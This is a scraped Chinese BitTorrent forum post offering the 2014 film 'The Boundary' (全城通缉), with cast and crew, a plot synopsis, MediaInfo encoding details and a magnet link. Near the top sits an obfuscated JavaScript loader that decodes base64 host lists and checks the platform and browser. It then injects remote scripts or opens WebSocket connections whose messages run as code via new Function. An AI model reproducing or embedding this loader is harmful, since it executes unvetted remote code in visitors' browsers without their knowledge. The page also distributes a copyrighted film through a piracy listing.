全城通缉[国语配音/中文字幕].The.Boundary.2014.1080p.HDR.WEB-DL.H265.AAC 1.42GB

版主小s 1月前 244

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 全城通缉 / 边缘线 / The Boundary
◎年  代 2014
◎产  地 中国大陆
◎类  别 剧情 / 悬疑
◎语  言 汉语普通话
◎上映日期 2014-11-06(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt4514606/
◎豆瓣评分 4.6/10 (14721人评价)
◎豆瓣链接 https://movie.douban.com/subject/25849599/
◎片  长 104分钟
◎导  演 汪涛 Tao Wang (id:1318322)
◎编  剧 陈渐 Jian Chen (id:1340606)
       李文 Wen Li (id:1343088)
◎演  员 刘烨 Ye Liu (id:1000572)
       赵文卓 Man Cheuk Chiu (id:1000526)
       秋瓷炫 Ja-Hyeon Chu (id:1221319)
       古力娜扎 Coulee Nazha (id:1315729)
       薛皓文 Haowen Xue (id:1330995)
       辉灿 Hwi Chan (id:1343936)
       马浴柯 Marc Ma (id:1327671)
       吴佩柔 Peirou Wu (id:1330499)
       李依馨 Yixin Li (id:1318750)
       刘黛希 Daisy Liu (id:1337037)
       冯远文 Yuen Man Fung (id:1369778)

◎标  签 悬疑 / 刘烨 / 赵文卓 / 犯罪 / 中国电影 / 2014 / 推理 / 中国

◎简  介
  在某座城市的破败角落,精英警员唐越(刘烨 饰)孤独住在一个即将拆除的老楼里。他等待着失踪十年的女友徐雅(吴佩柔 饰)归来,为了找到徐雅他辞去工作,最终却未得到任何令人为之一振的消息。“找到我,我就嫁给你”,这是徐雅失踪前留给唐越的信息,仿佛一条永远也解不开的谜语,唐越被深深困在其中。电视上,某外资银行中国区副总裁邵云峰(赵文卓 饰)和白氏集团的负责人白晓芸谈笑风生,而邵云峰则与唐越有着千丝万缕的关系,十年前被唐越所射杀的女劫持者(秋瓷炫 饰)更成为他脑海中挥之不去的噩梦。不久后,白晓芸被人残忍杀害,她的妹妹白晓若(娜扎 饰)则找到唐越请求他追查凶手,并承诺作为回报帮他找到徐雅。谁知唐越竟见到了当初被他枪杀的女人!                                    
                                扑朔迷离,全城通缉……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 166650153144275678005954921747334050509 (0x7D5FA6EAA241D38B05111E1DA5D832CD)

  4. Complete name                            : 全城通缉[email protected]v

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.42 GiB

  8. Duration                                 : 1 h 45 min

  9. Overall bit rate                         : 1 919 kb/s

  10. Encoded date                             : UTC 2021-08-07 13:42:46

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 45 min

  21. Bit rate                                 : 1 793 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 808 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 25.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.046

  31. Stream size                              : 1.33 GiB (93%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  39. Mastering display luminance              : min: 0.0001 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level              : 628 cd/m2

  41. Maximum Frame-Average Light Level        : 224 cd/m2


  42. Audio

  43. ID                                       : 2

  44. Format                                   : AAC LC

  45. Format/Info                              : Advanced Audio Codec Low Complexity

  46. Codec ID                                 : A_AAC-2

  47. Duration                                 : 1 h 45 min

  48. Bit rate                                 : 124 kb/s

  49. Channel(s)                               : 2 channels

  50. Channel layout                           : L R

  51. Sampling rate                            : 44.1 kHz

  52. Frame rate                               : 43.066 FPS (1024 SPF)

  53. Compression mode                         : Lossy

  54. Stream size                              : 94.2 MiB (6%)

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No



TAGS 剧情 悬疑

磁力链:
  • magnet:?xt=urn:btih:902BF2ADEF312742DC1C7467990E7EEBBECED507
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回